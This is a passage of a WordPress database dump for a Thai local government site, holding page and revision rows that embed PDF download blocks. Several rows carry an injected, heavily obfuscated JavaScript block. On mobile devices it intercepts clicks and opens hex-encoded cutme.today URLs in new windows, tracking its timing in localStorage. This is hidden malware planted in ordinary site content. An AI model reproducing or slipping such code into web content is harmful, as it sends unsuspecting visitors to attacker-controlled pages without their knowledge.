_0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการปฏิบัติงานประจำปี','','inherit','closed','closed','','703-revision-v1','','','2024-08-08 16:06:49','2024-08-08 09:06:49','',703,'http://pakhaeng.ssk.in.th/?p=707',0,'revision','',0),
(708,1,'2024-08-08 16:08:06','2024-08-08 09:08:06','<!-- wp:file {\"id\":709,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การเปิดโอกาสให้เกิดการมีส่วนร่วม\"></object><a id=\"wp-block-file--media-fa27beff-3bf1-486f-9ca5-6fe85e06f45c\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-fa27beff-3bf1-486f-9ca5-6fe85e06f45c\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การเปิดโอกาสให้เกิดการมีส่วนร่วม','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%aa%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b9%80%e0%b8%81%e0%b8%b4%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-08 16:08:07','2024-08-08 09:08:07','',0,'http://pakhaeng.ssk.in.th/?page_id=708',0,'page','',0),
(709,1,'2024-08-08 16:07:52','2024-08-08 09:07:52','','การเปิดโอกาสให้เกิดการมีส่วนร่วม','','inherit','','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9b%e0%b8%b4%e0%b8%94%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%aa%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b9%80%e0%b8%81%e0%b8%b4%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3','','','2024-08-08 16:07:52','2024-08-08 09:07:52','',708,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf',0,'attachment','application/pdf',0),
(710,1,'2024-08-08 16:08:06','2024-08-08 09:08:06','<!-- wp:file {\"id\":709,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การเปิดโอกาสให้เกิดการมีส่วนร่วม\"></object><a id=\"wp-block-file--media-fa27beff-3bf1-486f-9ca5-6fe85e06f45c\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การเปิดโอกาสให้เกิดการมีส่วนร่วม.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-fa27beff-3bf1-486f-9ca5-6fe85e06f45c\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การเปิดโอกาสให้เกิดการมีส่วนร่วม','','inherit','closed','closed','','708-revision-v1','','','2024-08-08 16:08:06','2024-08-08 09:08:06','',708,'http://pakhaeng.ssk.in.th/?p=710',0,'revision','',0),
(711,1,'2024-08-08 16:08:31','2024-08-08 09:08:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery 